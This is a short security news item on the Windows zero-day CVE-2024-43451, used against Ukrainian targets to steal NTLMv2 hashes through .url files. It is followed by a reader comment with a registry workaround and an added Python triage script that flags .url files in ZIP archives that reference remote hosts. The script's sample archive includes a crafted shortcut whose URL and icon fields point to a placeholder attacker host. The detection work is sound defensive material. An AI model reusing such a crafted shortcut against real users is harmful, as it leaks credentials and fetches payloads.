November 18th, 2024

Windows Zero-Day Exploited by Russia Triggered with File Drag-and-Drop, Delete

A newly discovered Windows zero-day vulnerability (CVE-2024-43451) has been exploited by Russian threat actors, targeting Ukrainian entities through phishing, allowing NTLMv2 hash theft with minimal user interaction.

A newly discovered zero-day vulnerability in Windows, tracked as CVE-2024-43451, has been exploited by suspected Russian threat actors, primarily against Ukrainian entities. The medium-severity flaw affects the MSHTML engine, which is used by the Edge browser in Internet Explorer mode and by other applications. The exploit can be triggered with minimal user interaction: deleting a file, dragging and dropping it, or right-clicking on it. Successful exploitation lets attackers steal NTLMv2 hashes, enabling pass-the-hash attacks to authenticate as the targeted user. ClearSky, the cybersecurity firm that identified the flaw, reported it to Microsoft in June 2024. The attackers sent phishing emails from a compromised Ukrainian government server, prompting victims to download malicious ZIP files containing a PDF and a URL file designed to exploit the vulnerability. The URL file connects to an external server to download additional malicious files, including the SparkRAT malware. The vulnerability is easier to exploit on Windows 10 and 11 than on older versions. The Computer Emergency Response Team of Ukraine (CERT-UA) has attributed the exploitation of this zero-day to a threat actor tracked as UAC-0194.

- A new Windows zero-day vulnerability (CVE-2024-43451) has been exploited by Russian threat actors.

- The exploit requires minimal user interaction, such as file deletion or right-clicking.

- Successful exploitation allows attackers to steal NTLMv2 hashes for authentication.

- The vulnerability primarily targets Ukrainian entities through phishing attacks.

- It is more easily exploited on Windows 10 and 11 than on older versions.

2 comments
By @out-of-ideas - 3 months
I could not find those 2 CLSIDs on my system, nor on the ol' Google

- 009862a0-0000-0000-c000-000000005986

- 009862a0-0000-0000-c000-000000000046

I was able to replicate the network traffic by selecting the file; a quick-n-dirty fix is to rename HKCR\.URL and HKCR\InternetShortcut (I just appended _bak to them); after restarting all explorer.exe processes it no longer tries to make a connection attempt

edit: formatting
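As an added defender-side example (not code from the article, ClearSky, or the commenter), the following Python triage script opens a ZIP attachment of the kind described above and flags any .url members whose fields point at an external host, which is what a mail gateway or incident responder would want to check before a user ever right-clicks or drags the file. The archive contents and host names are constructed placeholders, not indicators from the campaign.

```python
import configparser
import io
import zipfile
from urllib.parse import urlparse

# InternetShortcut fields that can name a remote resource and so can
# cause the shell to reach out to another host.
REMOTE_FIELDS = ("URL", "IconFile", "WorkingDirectory")


def remote_refs(url_text: str) -> list[tuple[str, str]]:
    """Return (field, value) pairs from a .url file that reference a remote host."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(url_text)
    except configparser.Error:
        return []  # malformed file: nothing parseable to report
    if "InternetShortcut" not in cp:
        return []
    section = cp["InternetShortcut"]
    hits = []
    for field in REMOTE_FIELDS:
        value = section.get(field, "")
        # UNC path (\\host\share\...) or any URL carrying a host component.
        if value.startswith("\\\\") or urlparse(value).netloc:
            hits.append((field, value))
    return hits


def triage_zip(data: bytes) -> dict[str, list[tuple[str, str]]]:
    """Map each .url member of a ZIP archive to the remote references it carries."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".url"):
                text = zf.read(name).decode("utf-8-sig", errors="replace")
                findings[name] = remote_refs(text)
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive: a decoy PDF, a suspicious .url, a benign .url."""
    suspicious = ("[InternetShortcut]\r\n"
                  "URL=http://attacker.invalid/payload\r\n"
                  "IconFile=\\\\attacker.invalid\\share\\icon.ico\r\n")
    benign = "[InternetShortcut]\r\nURL=file:///C:/docs/notes.txt\r\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4 placeholder")
        zf.writestr("report.url", suspicious)
        zf.writestr("local.url", benign)
    return buf.getvalue()
```

Running `triage_zip(build_sample_zip())` reports the two remote references in report.url and an empty list for local.url; only the former warrants blocking or further analysis.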